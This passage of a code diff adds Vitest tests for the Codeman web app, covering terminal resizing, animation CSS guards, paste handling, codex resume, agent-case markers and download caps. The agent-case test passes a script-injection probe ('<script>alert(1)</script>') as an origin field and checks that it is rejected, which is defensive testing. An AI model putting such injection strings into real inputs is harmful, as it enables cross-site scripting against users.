CodemanApp: FakeCodemanApp,
window: { addEventListener: vi.fn(), removeEventListener: vi.fn(), innerWidth: 1600 },
document: { addEventListener: vi.fn() },
fetch: (...args: unknown[]) => currentFetch(...args),
});
vm.runInContext(source, context);
return FakeCodemanApp.prototype;
}
const mixin = loadTerminalMixin();
const SESSION = 'session-A';
function makeApp(overrides: Record<string, unknown> = {}) {
const fetchMock = vi.fn(async () => ({ json: async () => ({ data: { changed: true } }) }));
currentFetch = fetchMock;
const app = {
sendResize: mixin.sendResize,
getTerminalDimensions: () => ({ cols: 120, rows: 40 }),
fitAddon: { fit: vi.fn() },
detachedSessions: new Set<string>(),
isSoloWindow: false,
_lastResizeDims: null as { cols: number; rows: number } | null,
_wsReady: false,
_wsSessionId: null as string | null,
...overrides,
} as Record<string, unknown> & { sendResize: (id: string, o?: object) => Promise<boolean> };
return { app, fetchMock };
}
describe('detached sessions own their pane size', () => {
it('the dashboard does not resize a session showing in its own window', async () => {
const { app, fetchMock } = makeApp();
(app.detachedSessions as Set<string>).add(SESSION);
const changed = await app.sendResize(SESSION);
expect(changed).toBe(false);
// No request: the popup's size stands on the server.
expect(fetchMock).not.toHaveBeenCalled();
// The LOCAL fit still runs, so the dashboard's own xterm stays correct and
// tab-rail-resize's single settle-time refit is not swallowed. Same line the
// mobile-keyboard guard draws: withhold the send, never the reflow.
expect((app.fitAddon as { fit: ReturnType<typeof vi.fn> }).fit).toHaveBeenCalled();
});
it('the solo window still sizes the session it displays', async () => {
const { app, fetchMock } = makeApp({ isSoloWindow: true });
(app.detachedSessions as Set<string>).add(SESSION);
await app.sendResize(SESSION);
// The popup is the owner, so being marked detached must not stop it.
expect(fetchMock).toHaveBeenCalledTimes(1);
expect((app.fitAddon as { fit: ReturnType<typeof vi.fn> }).fit).toHaveBeenCalled();
});
it('the dashboard resizes a session that is not detached', async () => {
const { app, fetchMock } = makeApp();
await app.sendResize(SESSION);
expect(fetchMock).toHaveBeenCalledTimes(1);
});
});
/**
* `_redock` lives on the CodemanApp class rather than the terminal mixin, so it
* needs app.js loaded. Same `vm` approach as terminal-flush-budget.test.ts.
*/
function loadAppClass() {
const dir = resolve(import.meta.dirname, '../src/web/public');
const context = vm.createContext({
console: { ...console, log: vi.fn(), warn: vi.fn(), error: vi.fn() },
performance: { now: () => 0 },
setInterval: vi.fn(),
clearInterval: vi.fn(),
setTimeout,
clearTimeout,
requestAnimationFrame: vi.fn(),
HTMLCanvasElement: class HTMLCanvasElement {},
WebSocket: { OPEN: 1 },
fetch: vi.fn(),
document: { addEventListener: vi.fn(), getElementById: () => null, querySelector: () => null },
localStorage: { length: 0, key: vi.fn(), getItem: vi.fn(), setItem: vi.fn(), removeItem: vi.fn() },
window: { addEventListener: vi.fn(), removeEventListener: vi.fn() },
MobileDetection: { isTouchDevice: () => false },
});
const constants = readFileSync(resolve(dir, 'constants.js'), 'utf8');
const appSource = readFileSync(resolve(dir, 'app.js'), 'utf8');
vm.runInContext(`${constants}\n${appSource}\nglobalThis.__CodemanApp = CodemanApp;`, context);
return (context as { __CodemanApp: { prototype: Record<string, unknown> } }).__CodemanApp;
}
describe('redock takes the sizing back', () => {
const CodemanApp = loadAppClass();
function makeDashboard(activeSessionId: string | null) {
const app = Object.create(CodemanApp.prototype) as Record<string, any>;
app.detachedSessions = new Set([SESSION]);
app.detachedWindows = new Map();
app._detachWatchTimers = new Map();
app._redockGrace = new Map();
app._detachOrphanStrikes = new Map();
app.sessions = new Map([[SESSION, { id: SESSION }]]);
app.activeSessionId = activeSessionId;
app._lastResizeDims = { cols: 120, rows: 40 };
app.$ = () => null;
app.sendResize = vi.fn(() => Promise.resolve(true));
return app;
}
it('clears the stale dimensions so the next send reports truthfully', () => {
// The popup sized the pane while it owned the session, so this window's one
// global record of "what the PTY holds" is wrong. Left in place, the next
// sendResize returns "unchanged" and selectSession skips its redraw wait.
const app = makeDashboard(SESSION);
app._redock(SESSION);
expect(app._lastResizeDims).toBeNull();
});
it('clears them even when the redocked session is not the active one', () => {
// Pop out A, switch to B, close the popup: no resize is due, but the stale
// record still has to go or selecting A later lies about it.
const app = makeDashboard('some-other-session');
app._redock(SESSION);
expect(app._lastResizeDims).toBeNull();
expect(app.sendResize).not.toHaveBeenCalled();
});
it('re-asserts this window size for the session it is showing', () => {
const app = makeDashboard(SESSION);
app._redock(SESSION);
expect(app.sendResize).toHaveBeenCalledWith(SESSION, { force: true });
// Un-marked first, or the yield in sendResize would swallow the re-assert.
expect(app.detachedSessions.has(SESSION)).toBe(false);
});
it('sends nothing for a session that is gone', () => {
// _onSessionDeleted redocks before cleanup, so the id can already be dead;
// the resize would be a guaranteed 404.
const app = makeDashboard(SESSION);
app.sessions.delete(SESSION);
app._redock(SESSION);
expect(app.sendResize).not.toHaveBeenCalled();
});
});
+174
View File
@@ -0,0 +1,174 @@
/**
* @fileoverview Static guards for the entrance-animation styles (App Settings →
* Appearance → Entrance Animations, plus the `?animlab=1` picker).
*
* A style is FOUR things that have to line up, and any one of them missing fails
* silently rather than loudly: the entry in the style array in
* entrance-animations.js (which is what the lab lists and what `_styleDuration`
* reads), the `html[data-*-anim="<key>"]` rule in styles.css, the @keyframes
* block that rule names, and — for a style that belongs to a theme — the theme's
* `<option>` in index.html. A style with no CSS behind it renders as "the
* animation silently does nothing"; a rule naming a keyframe block that does not
* exist behaves the same way.
*
* The terminal pane carries an extra rule of its own, and it is the one with
* teeth: xterm's FitAddon derives rows+cols from getComputedStyle(parent)
* .width/height, so a terminal keyframe that animates a box-model property would
* resize the PTY mid-animation. Only paint-level properties are allowed there.
*/
import { readFileSync } from 'node:fs';
import { resolve } from 'node:path';
import { describe, expect, it } from 'vitest';
const animSource = readFileSync(resolve('src/web/public/entrance-animations.js'), 'utf8');
const stylesSource = readFileSync(resolve('src/web/public/styles.css'), 'utf8');
const indexSource = readFileSync(resolve('src/web/public/index.html'), 'utf8');
/** Surfaces, keyed by the `data-*-anim` attribute their styles are selected by. */
const SURFACES = [
{ attr: 'tab', array: 'TAB_ANIM_STYLES', selector: '.session-tab.tab-enter' },
{ attr: 'win', array: 'WIN_ANIM_STYLES', selector: '.subagent-window.win-enter' },
{ attr: 'line', array: 'LINE_ANIM_STYLES', selector: '.connection-line.line-enter' },
{ attr: 'term', array: 'TERM_ANIM_STYLES', selector: '.terminal-container.term-enter' },
] as const;
/**
* Styles with no CSS of their own, by design: `off` means "do nothing" and `fly`
* is the pre-existing JS transition in subagent-windows.js, which deliberately
* skips the `win-enter` class entirely.
*/
const CSS_LESS_STYLES = new Set(['off', 'fly']);
function styleKeys(arrayName: string): string[] {
const start = animSource.indexOf(`const ${arrayName} = [`);
expect(start, `${arrayName} not found`).toBeGreaterThan(-1);
const body = animSource.slice(start, animSource.indexOf('];', start));
return [...body.matchAll(/\{ key: '([^']+)'/g)].map((m) => m[1]);
}
function themes(): { key: string; tab: string; win: string; line: string; term: string }[] {
const start = animSource.indexOf('const ANIM_THEMES = [');
const body = animSource.slice(start, animSource.indexOf('];', start));
return [
...body.matchAll(/\{ key: '([^']+)'.*?tab: '([^']+)', win: '([^']+)', line: '([^']+)', term: '([^']+)' \}/g),
].map((m) => ({ key: m[1], tab: m[2], win: m[3], line: m[4], term: m[5] }));
}
/**
* Every `animation-name:` a `html[data-<attr>-anim="<key>"]` block asks for,
* tagged with whether it runs on the element itself or on its ::before overlay.
* The distinction matters for the terminal: the FitAddon rule below binds to the
* container, while ::before is a throwaway wash that may animate anything.
*/
function animationNamesFor(attr: string, key: string): { name: string; onPseudo: boolean }[] {
const rules = [...stylesSource.matchAll(new RegExp(`html\\[data-${attr}-anim="${key}"\\]([^{]*)\\{([^}]*)\\}`, 'g'))];
return rules.flatMap((rule) =>
[...rule[2].matchAll(/animation-name:\s*([\w-]+);/g)].map((m) => ({
name: m[1],
onPseudo: rule[1].includes('::before'),
}))
);
}
function keyframeBody(name: string): string | null {
const start = stylesSource.indexOf(`@keyframes ${name} {`);
if (start === -1) return null;
return stylesSource.slice(start, stylesSource.indexOf('\n}', start));
}
describe('entrance animation styles', () => {
for (const surface of SURFACES) {
describe(`${surface.attr} surface`, () => {
it('backs every style with a rule that names a keyframe block that exists', () => {
for (const key of styleKeys(surface.array)) {
if (CSS_LESS_STYLES.has(key)) {
expect(stylesSource).not.toContain(`html[data-${surface.attr}-anim="${key}"]`);
continue;
}
const names = animationNamesFor(surface.attr, key);
expect(names.length, `no animation-name for ${surface.attr}/${key}`).toBeGreaterThan(0);
for (const { name } of names) {
expect(keyframeBody(name), `@keyframes ${name} missing`).not.toBeNull();
}
// The style has to reach the element the surface actually animates,
// not just any selector carrying the attribute.
expect(stylesSource).toContain(`html[data-${surface.attr}-anim="${key}"] ${surface.selector}`);
}
});
});
}
it('ships the blur style on all four surfaces', () => {
for (const surface of SURFACES) expect(styleKeys(surface.array)).toContain('blur');
});
it('gives every theme an <option> and only styles that exist', () => {
for (const theme of themes()) {
expect(indexSource, `no <option value="${theme.key}">`).toContain(`<option value="${theme.key}">`);
for (const surface of SURFACES) {
expect(styleKeys(surface.array), `theme ${theme.key} names an unknown ${surface.attr} style`).toContain(
theme[surface.attr]
);
}
}
// 'custom' is a readout of a lab mix, never a theme you can select into.
expect(indexSource).toContain('<option value="custom">');
expect(themes().map((t) => t.key)).not.toContain('custom');
});
it('keeps every entrance under the reduced-motion kill switch', () => {
const start = stylesSource.indexOf('@media (prefers-reduced-motion: reduce) {\n .session-tab.tab-enter,');
expect(start, 'the entrance reduced-motion block moved or was renamed').toBeGreaterThan(-1);
const block = stylesSource.slice(
start,
stylesSource.indexOf('\n}', stylesSource.indexOf('animation: none', start))
);
for (const surface of SURFACES) expect(block).toContain(surface.selector);
});
/**
* ⚠ The FitAddon rule. It reads getComputedStyle(parent).width/height, i.e. the
* untransformed LAYOUT box, so paint-level properties are invisible to it and a
* box-model property here would resize the PTY mid-animation.
*/
it('animates only paint-level properties on the terminal pane', () => {
const allowed = new Set(['opacity', 'transform', 'clip-path', 'filter']);
for (const key of styleKeys('TERM_ANIM_STYLES')) {
if (CSS_LESS_STYLES.has(key)) continue;
for (const { name, onPseudo } of animationNamesFor('term', key)) {
if (onPseudo) continue; // a wash over the pane, it has no layout of its own
const body = keyframeBody(name);
expect(body).not.toBeNull();
for (const [, prop] of (body as string).matchAll(/(?:\{|;)\s*([a-z-]+):/g)) {
expect(allowed.has(prop), `@keyframes ${name} animates ${prop} on the terminal pane`).toBe(true);
}
}
}
});
/**
* The `blur` line entrance animates `filter`, and a keyframe listing only the
* blur would drop each line's own glow for the length of the run and pop it
* back at the end. Both frames say `blur(N) var(--line-glow)` so the function
* lists match and interpolate, which only works while both kinds of line
* actually define that variable.
*/
it('routes both kinds of connection line through --line-glow', () => {
for (const selector of ['.connection-line {', '.connection-line.lineage-line {']) {
const start = stylesSource.indexOf(selector);
expect(start, `${selector} not found`).toBeGreaterThan(-1);
const block = stylesSource.slice(start, stylesSource.indexOf('\n}', start));
expect(block, `${selector} must define --line-glow`).toContain('--line-glow:');
expect(block, `${selector} must apply it`).toContain('filter: var(--line-glow);');
}
const blur = keyframeBody('line-enter-blur') as string;
expect(blur).not.toBeNull();
expect(blur.match(/var\(--line-glow\)/g)?.length).toBe(2);
// The 100% frame deliberately omits opacity so the endpoint comes from the
// element's own resting value: 0.9 on a subagent line, 0.72 on a lineage
// line, 0.95 on a working one. Pinning a number here snaps three of them.
expect(blur).toMatch(/100%\s*\{\s*filter:[^}]*\}/);
expect(blur).not.toMatch(/100%\s*\{[^}]*opacity/);
});
});
+176
View File
@@ -0,0 +1,176 @@
/**
* @fileoverview Unit tests for the Ctrl+V paste trap in image-input.js.
*
* `_handleImagePaste()` appends a hidden contenteditable div (the "paste
* trap"), focuses it, and reads the clipboard out of the paste event the
* browser delivers there. Two things can deliver that event for a single
* Ctrl+V: the `document.execCommand('paste')` the function issues itself, and
* the keydown's own default action, which still runs because xterm's custom key
* handler returns false without cancelling the event. A browser that honours
* execCommand('paste') therefore fires the trap's listener twice, and the
* clipboard text used to reach the PTY twice with it — while right-click →
* Paste, which involves no keydown, stayed correct.
*
* Loads the browser module into a vm sandbox with a fake document, so the tests
* drive the trap's listener directly rather than through a real browser.
*/
import { readFileSync } from 'node:fs';
import { resolve } from 'node:path';
import vm from 'node:vm';
import { describe, expect, it } from 'vitest';
interface TrapListener {
(e: Record<string, unknown>): void;
}
interface FakeTrap {
contentEditable: string;
style: { cssText: string };
parentNode: unknown;
focus: () => void;
addEventListener: (ev: string, fn: TrapListener) => void;
}
interface Harness {
/** Fire a paste event on the trap the last _handleImagePaste() call created. */
firePaste: (payload: { text?: string; images?: string[] }) => void;
/** Text handed to xterm's terminal.paste(), one entry per call. */
pastedText: string[];
/** Image batches handed to _uploadAndInsertImages(), one entry per call. */
uploadedBatches: Array<Array<{ type: string }>>;
/** How many trap divs are still attached to the fake body. */
attachedTraps: () => number;
runTimers: () => void;
}
function loadPasteHarness(): Harness {
const traps: FakeTrap[] = [];
const listeners: TrapListener[] = [];
const attached = new Set<FakeTrap>();
const timers: Array<() => void> = [];
const documentObj = {
createElement: (): FakeTrap => {
const trap: FakeTrap = {
contentEditable: '',
style: { cssText: '' },
parentNode: null,
focus: () => {},
addEventListener: (ev: string, fn: TrapListener) => {
if (ev === 'paste') listeners.push(fn);
},
};
traps.push(trap);
return trap;
},
body: {
appendChild: (el: FakeTrap) => {
attached.add(el);
el.parentNode = documentObj.body;
},
removeChild: (el: FakeTrap) => {
attached.delete(el);
el.parentNode = null;
},
},
// A browser that honours the command fires the trap's paste listener from
// here as well; the tests model that by firing the listener twice.
execCommand: () => true,
getElementById: () => null,
};
const context = vm.createContext({
window: {},
document: documentObj,
setTimeout: (fn: () => void) => {
timers.push(fn);
return timers.length;
},
clearTimeout: () => {},
console,
});
vm.runInContext('class CodemanApp {}', context);
const src = readFileSync(resolve(import.meta.dirname, '../src/web/public/image-input.js'), 'utf8');
vm.runInContext(src, context, { filename: 'image-input.js' });
const CodemanApp = vm.runInContext('CodemanApp', context) as new () => Record<string, unknown>;
const pastedText: string[] = [];
const uploadedBatches: Array<Array<{ type: string }>> = [];
const app = new CodemanApp();
app.activeSessionId = 'session-1';
app.terminal = {
paste: (text: string) => pastedText.push(text),
focus: () => {},
};
app._uploadAndInsertImages = (files: Array<{ type: string }>) => {
uploadedBatches.push(Array.from(files));
};
app.showToast = () => {};
(app._handleImagePaste as () => void).call(app);
return {
firePaste({ text = '', images = [] }) {
const items = images.map((type) => ({ type, getAsFile: () => ({ type }) }));
const event = {
clipboardData: {
items,
getData: () => text,
},
preventDefault: () => {},
stopPropagation: () => {},
};
for (const fn of listeners) fn(event);
},
pastedText,
uploadedBatches,
attachedTraps: () => attached.size,
runTimers: () => {
const pending = timers.splice(0, timers.length);
for (const fn of pending) fn();
},
};
}
describe('Ctrl+V paste trap', () => {
it('sends clipboard text to the terminal once for a single paste event', () => {
const h = loadPasteHarness();
h.firePaste({ text: 'hello world' });
expect(h.pastedText).toEqual(['hello world']);
});
it('ignores a second paste event for the same Ctrl+V', () => {
const h = loadPasteHarness();
// execCommand('paste') and the uncancelled keydown's default action both
// land on the same trap in browsers that honour the command.
h.firePaste({ text: 'hello world' });
h.firePaste({ text: 'hello world' });
expect(h.pastedText).toEqual(['hello world']);
});
it('uploads a pasted image once when the trap sees two paste events', () => {
const h = loadPasteHarness();
h.firePaste({ images: ['image/png'] });
h.firePaste({ images: ['image/png'] });
expect(h.uploadedBatches).toHaveLength(1);
expect(h.uploadedBatches[0]).toEqual([{ type: 'image/png' }]);
expect(h.pastedText).toEqual([]);
});
it('removes the trap and hands focus back after the paste it accepted', () => {
const h = loadPasteHarness();
h.firePaste({ text: 'hello world' });
expect(h.attachedTraps()).toBe(1);
h.runTimers();
expect(h.attachedTraps()).toBe(0);
});
});
+31
View File
@@ -224,6 +224,37 @@ describe('mobile overview model', () => {
expect(model.past[0].title).toBe('w4-claudeman');
});
it('carries resumeId through to the past row so a Codex tap resumes its thread', () => {
const app = loadOverviewApp();
const model = app.buildMobileOverviewModel({
sessions: [],
cases: CASES,
history: [
{
sessionId: 'rollout-1',
workingDir: '/home/arkon/codeman-cases/beta',
firstPrompt: 'port the parser',
mode: 'codex',
resumeId: 'codex-thread-id',
lastActivityAt: 300,
},
// A claude row carries none, and must not grow one.
{
sessionId: 'claude-1',
workingDir: '/home/arkon/default/claudeman',
claudeSessionId: 'claude-uuid-a',
lastActivityAt: 200,
},
],
});
// resumeMobileOverviewSession() reads row.resumeId off exactly this projection and
// hands it to resumeHistorySession(); an undefined here is a fresh codex session on
// a thread that already exists, which is the phone-only half of the resume feature.
expect(model.past[0]).toMatchObject({ mode: 'codex', resumeId: 'codex-thread-id' });
expect(model.past[1].resumeId).toBeUndefined();
});
it('does not title a past row with the transcript reader placeholder', () => {
const app = loadOverviewApp();
const model = app.buildMobileOverviewModel({
+33 -1
View File
@@ -20,7 +20,7 @@ import {
} from '../scripts/pr-bot/report.js';
import { classifyCi, latestRunPerWorkflow, type PrSummary, type WorkflowRun } from '../scripts/pr-bot/github.js';
import { parseCallback, parseCommand, prNumberFromMessageText } from '../scripts/pr-bot/telegram.js';
import { trustDialogKey } from '../scripts/pr-bot/codeman-client.js';
import { findModelLimitNotice, trustDialogKey } from '../scripts/pr-bot/codeman-client.js';
import { buildConfig, parseEnvFile } from '../scripts/pr-bot/config.js';
import { buildReviewBrief } from '../scripts/pr-bot/review-task.js';
@@ -302,6 +302,38 @@ describe('trustDialogKey', () => {
});
});
describe('findModelLimitNotice', () => {
// Captured off prbot-394's pane on 2026-09-08, the run that lost 40 minutes: Claude
// Code answers a spent budget inside the turn and then simply sits there.
const SPENT_PANE = [
'\x1b[38;5;153m\u276f\x1b[39m Read /home/arkon/.codeman/pr-bot/jobs/pr-394/brief.md and do the review.',
" \u23bf You've reached your Fable limit. Run /usage-credits to continue or switch models with /model.",
'\u273b Saut\u00e9ed for 1s \u00b7 done 7:16 PM',
].join('\n');
it('finds the notice on a real pane, ANSI and gutter glyph stripped', () => {
expect(findModelLimitNotice(SPENT_PANE)).toBe(
"You've reached your Fable limit. Run /usage-credits to continue or switch models with /model."
);
});
it('is not tied to one model name or to a straight apostrophe', () => {
// The pane renders a typographic apostrophe, and every model prints this sentence.
expect(
findModelLimitNotice(' \u23bf You\u2019ve reached your Opus limit. Run /usage-credits to continue.')
).toContain('reached your Opus limit');
expect(findModelLimitNotice('You have reached your Sonnet 5 limit.')).toContain('Sonnet 5');
});
it('says nothing about an ordinary working pane', () => {
expect(findModelLimitNotice('\u273b Actualizing\u2026 (13m 23s \u00b7 esc to interrupt)')).toBeUndefined();
expect(findModelLimitNotice('')).toBeUndefined();
// The bare word is not the notice: a review whose own findings discuss usage limits
// must not be reported as an exhausted account.
expect(findModelLimitNotice('the usage limit parser handles the 5-hour reset')).toBeUndefined();
});
});
describe('config', () => {
it('parses env files with quotes, comments and export prefixes', () => {
const env = parseEnvFile('# c\nexport A="x y"\nB=\'z\'\nC=plain\nbad line\n=nokey\n');
+39 -1
View File
@@ -90,7 +90,7 @@ describe('resumeHistorySession: row retirement is gated on actual continuation',
fetchMock = stubFetch('new-session-id');
});
it.each(['codex', 'gemini', 'antigravity'])(
it.each(['gemini', 'antigravity'])(
'does NOT retire the old row for %s (no continuation is wired for it)',
async (mode) => {
const app = makeApp();
@@ -104,6 +104,44 @@ describe('resumeHistorySession: row retirement is gated on actual continuation',
}
);
// codex continues only when the row carried its thread id. A row without one
// is a live session's row, whose sessionId is Codeman's own uuid — sending
// THAT to `codex resume` asks for a thread that does not exist, so it must
// stay a fresh session and must not retire the row it came from.
it('does NOT continue or retire a codex row that carries no resumeId', async () => {
const app = makeApp();
await app.resumeHistorySession.call(app, 'codeman-uuid', '/repo', 'w1-repo', 'codex');
expect(createBody(fetchMock)).toMatchObject({ mode: 'codex' });
expect(createBody(fetchMock).codexConfig).toBeUndefined();
expect(deleteCalls(fetchMock)).toEqual([]);
});
it('resumes a codex row by the thread id the row carried', async () => {
const app = makeApp();
await app.resumeHistorySession.call(
app,
'01a060f0-0361-7f91-abde-b283020db0d7',
'/repo',
'w1-repo',
'codex',
'01a060f0-0361-7f91-abde-b283020db0d7'
);
expect(createBody(fetchMock)).toMatchObject({
mode: 'codex',
codexConfig: { resumeSessionId: '01a060f0-0361-7f91-abde-b283020db0d7' },
});
});
it('ignores a resumeId on a row that is not codex', async () => {
const app = makeApp();
await app.resumeHistorySession.call(app, 'old-id', '/repo', 'w1-repo', 'gemini', 'some-thread-id');
expect(createBody(fetchMock).codexConfig).toBeUndefined();
expect(deleteCalls(fetchMock)).toEqual([]);
});
it.each([
['opencode', 'openCodeConfig'],
['pi', 'piConfig'],
@@ -0,0 +1,209 @@
/**
* @fileoverview End-to-end wiring of the agent-case label: quick-start writes the
* marker, the case list publishes it, and `GET /api/cases/agent-created` reports it
* for cleanup.
*
* The rules under test are the ones that decide whether the cleanup list can be
* trusted: only a directory quick-start CREATES is ever labelled (a pre-existing
* case — a linked repo, a real project — never is), a spawn with no agent signal at
* all leaves no marker, the lineage header alone is enough to label one (that is how
* a stale skill copy still gets swept up), and a case a live session is working in is
* reported as `inUse` rather than silently offered up for deletion.
*
* Real filesystem against the per-file temp HOME from test/setup.ts, so the marker is
* asserted as bytes on disk rather than through a mock.
*
* Port: N/A (app.inject()).
*/
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
import Fastify, { type FastifyInstance } from 'fastify';
import fastifyCookie from '@fastify/cookie';
import { mkdir, rm, readFile } from 'node:fs/promises';
import { join } from 'node:path';
import { createMockRouteContext, createMockSession, type MockRouteContext } from '../mocks/index.js';
import { installRouteErrorHandler } from '../../src/web/route-error-handler.js';
import { registerSessionRoutes } from '../../src/web/routes/session-routes.js';
import { registerCaseRoutes } from '../../src/web/routes/case-routes.js';
import { getCasesDir } from '../../src/config/cases-dir.js';
import { AGENT_CASE_MARKER_FILE } from '../../src/agent-case-marker.js';
import type { AgentCaseSummary, CaseInfo } from '../../src/types.js';
const PARENT_ID = 'test-session-1'; // the id the mock context pre-populates
interface Harness {
app: FastifyInstance;
ctx: MockRouteContext;
}
async function createHarness(): Promise<Harness> {
const app = Fastify({ logger: false });
await app.register(fastifyCookie);
const ctx = createMockRouteContext();
registerSessionRoutes(app, ctx);
registerCaseRoutes(app, ctx);
installRouteErrorHandler(app);
await app.ready();
return { app, ctx };
}
describe('agent-created case marker', () => {
let harness: Harness;
const created: string[] = [];
/** Spawn a worker through quick-start, the skill's usual route. */
async function quickStart(caseName: string, opts: { headers?: Record<string, string>; payload?: object } = {}) {
created.push(caseName);
return harness.app.inject({
method: 'POST',
url: '/api/quick-start',
headers: opts.headers,
payload: { caseName, mode: 'claude', ...(opts.payload ?? {}) },
});
}
const markerPath = (caseName: string) => join(getCasesDir(), caseName, AGENT_CASE_MARKER_FILE);
async function readMarker(caseName: string): Promise<Record<string, unknown> | null> {
try {
return JSON.parse(await readFile(markerPath(caseName), 'utf-8'));
} catch {
return null;
}
}
async function listCases(): Promise<CaseInfo[]> {
const res = await harness.app.inject({ method: 'GET', url: '/api/cases' });
const body = JSON.parse(res.body);
return (body.data ?? body) as CaseInfo[];
}
async function listAgentCases(): Promise<AgentCaseSummary[]> {
const res = await harness.app.inject({ method: 'GET', url: '/api/cases/agent-created' });
expect(res.statusCode).toBe(200);
return JSON.parse(res.body).data.cases as AgentCaseSummary[];
}
beforeEach(async () => {
harness = await createHarness();
});
afterEach(async () => {
await harness.app.close();
for (const name of created.splice(0)) {
await rm(join(getCasesDir(), name), { recursive: true, force: true });
}
});
it('labels a case directory created for a spawn carrying the skill origin header', async () => {
const res = await quickStart('agentcase1', {
headers: { 'x-codeman-agent-origin': 'codeman-skill', 'x-codeman-parent-session': PARENT_ID },
});
expect(res.statusCode).toBe(200);
const marker = await readMarker('agentcase1');
expect(marker).toMatchObject({
version: 1,
createdBy: 'codeman-skill',
parentSessionId: PARENT_ID,
mode: 'claude',
});
expect(Date.parse(String(marker?.createdAt))).not.toBeNaN();
});
it('accepts the origin as a body field too, with the body winning', async () => {
await quickStart('agentcase2', {
headers: { 'x-codeman-agent-origin': 'codeman-skill' },
payload: { agentOrigin: 'my-orchestrator' },
});
expect(await readMarker('agentcase2')).toMatchObject({ createdBy: 'my-orchestrator' });
});
it('labels a spawn that carries only the lineage header, which is how an older skill copy still gets swept up', async () => {
await quickStart('agentcase3', { headers: { 'x-codeman-parent-session': PARENT_ID } });
expect(await readMarker('agentcase3')).toMatchObject({
createdBy: 'agent-session',
parentSessionId: PARENT_ID,
});
});
it('writes NO marker for a spawn with no agent signal at all', async () => {
// A human clicking Run in the browser sets neither header, and their case must
// not turn up in a cleanup list.
await quickStart('humancase1');
expect(await readMarker('humancase1')).toBeNull();
});
it('never labels a directory that already existed', async () => {
// The linchpin: a linked case or a real repo is not ours to offer for deletion,
// and the create branch is the only place the marker may be written.
const name = 'preexisting1';
created.push(name);
await mkdir(join(getCasesDir(), name), { recursive: true });
const res = await harness.app.inject({
method: 'POST',
url: '/api/quick-start',
headers: { 'x-codeman-agent-origin': 'codeman-skill' },
payload: { caseName: name, mode: 'claude' },
});
expect(res.statusCode).toBe(200);
expect(await readMarker(name)).toBeNull();
});
it('drops an unrecognised origin token rather than storing it', async () => {
await quickStart('agentcase4', { payload: { agentOrigin: '<script>alert(1)</script>' } });
// No parent either, so nothing labels this one at all.
expect(await readMarker('agentcase4')).toBeNull();
});
it('still spawns the worker when the origin is bogus', async () => {
const res = await quickStart('agentcase5', { payload: { agentOrigin: 'not a token' } });
expect(res.statusCode).toBe(200);
expect(JSON.parse(res.body).sessionId ?? JSON.parse(res.body).data?.sessionId).toBeTruthy();
});
it('publishes the label on GET /api/cases and hides it from cases without one', async () => {
await quickStart('agentcase6', { headers: { 'x-codeman-agent-origin': 'codeman-skill' } });
await quickStart('humancase2');
const cases = await listCases();
expect(cases.find((c) => c.name === 'agentcase6')?.agentCreated).toMatchObject({ createdBy: 'codeman-skill' });
expect(cases.find((c) => c.name === 'humancase2')?.agentCreated).toBeUndefined();
});
it('lists only agent cases in the cleanup listing, newest first', async () => {
await quickStart('agentcase7', { headers: { 'x-codeman-agent-origin': 'codeman-skill' } });
await quickStart('humancase3');
const listed = await listAgentCases();
expect(listed.map((c) => c.name)).toContain('agentcase7');
expect(listed.map((c) => c.name)).not.toContain('humancase3');
const sorted = [...listed].sort((a, b) => b.createdAt.localeCompare(a.createdAt));
expect(listed.map((c) => c.name)).toEqual(sorted.map((c) => c.name));
});
it('flags a case a live session is still working in as inUse', async () => {
// Deleting one of these would pull the rug out from under a running worker, so
// the UI excludes it rather than confirming it away.
await quickStart('agentcase8', { headers: { 'x-codeman-agent-origin': 'codeman-skill' } });
const busyPath = join(getCasesDir(), 'agentcase8');
const busy = createMockSession('busy-session') as unknown as { workingDir: string };
busy.workingDir = busyPath;
harness.ctx.sessions.set('busy-session', busy as never);
const entry = (await listAgentCases()).find((c) => c.name === 'agentcase8');
expect(entry?.inUse).toBe(true);
expect(entry?.path).toBe(busyPath);
});
it('reports a marker-less case space as an empty list rather than failing', async () => {
expect(await listAgentCases()).toEqual([]);
});
});
+16 -2
View File
@@ -191,7 +191,9 @@ describe('file-raw range requests', () => {
});
it('still refuses files past the raw size cap before looking at Range', async () => {
mockedStat.mockResolvedValue({ size: 100 * 1024 * 1024, isFile: () => true } as never);
// 3GB, past the 2GB CODEMAN_MAX_DOWNLOAD_BYTES default. The cap is checked
// before the range, so a small slice of an oversized file is refused too.
mockedStat.mockResolvedValue({ size: 3 * 1024 * 1024 * 1024, isFile: () => true } as never);
const res = await harness.app.inject({
method: 'GET',
@@ -199,6 +201,18 @@ describe('file-raw range requests', () => {
headers: { range: 'bytes=0-99' },
});
expect(res.statusCode).toBe(400);
expect(res.statusCode).toBe(413);
});
it('serves a 100MB file that the historical 50MB cap would have refused', async () => {
mockedStat.mockResolvedValue({ size: 100 * 1024 * 1024, isFile: () => true } as never);
const res = await harness.app.inject({
method: 'GET',
url: rawUrl('big.mp4'),
headers: { range: 'bytes=0-99' },
});
expect(res.statusCode).toBe(206);
});
});
+32 -6
View File
@@ -802,14 +802,27 @@ describe('file-routes', () => {
expect(res.statusCode).toBe(404);
});
it('rejects overly large raw files', async () => {
mockedStat.mockResolvedValue({ size: 100 * 1024 * 1024 } as never); // 100MB
it('serves a file past the historical 50MB cap', async () => {
// The body is streamed and Range-aware, so size costs a read stream, not
// RSS. The old 50MB refusal only blocked legitimate artifact downloads.
mockedStat.mockResolvedValue({ size: 100 * 1024 * 1024, isFile: () => true } as never); // 100MB
const res = await harness.app.inject({
method: 'GET',
url: `/api/sessions/${harness.ctx._sessionId}/file-raw?path=huge.bin`,
});
expect(res.statusCode).toBe(400);
expect(res.statusCode).toBe(200);
});
it('still refuses a file past the configured download cap', async () => {
mockedStat.mockResolvedValue({ size: 3 * 1024 * 1024 * 1024, isFile: () => true } as never); // 3GB > 2GB default
const res = await harness.app.inject({
method: 'GET',
url: `/api/sessions/${harness.ctx._sessionId}/file-raw?path=enormous.bin`,
});
expect(res.statusCode).toBe(413);
expect(JSON.parse(res.body).error).toContain('CODEMAN_MAX_DOWNLOAD_BYTES');
});
});
@@ -863,8 +876,9 @@ describe('file-routes', () => {
});
it('downloads files scoped to the session working directory', async () => {
const content = Buffer.from('download content');
mockedReadFile.mockResolvedValue(content as never);
// The body is streamed (shared sendFileBody path), so the bytes come from
// the createReadStream mock rather than from readFile.
const content = Buffer.from('fake file bytes');
mockedStat.mockResolvedValue({ size: content.length, isFile: () => true } as never);
const res = await harness.app.inject({
@@ -874,7 +888,19 @@ describe('file-routes', () => {
expect(res.statusCode).toBe(200);
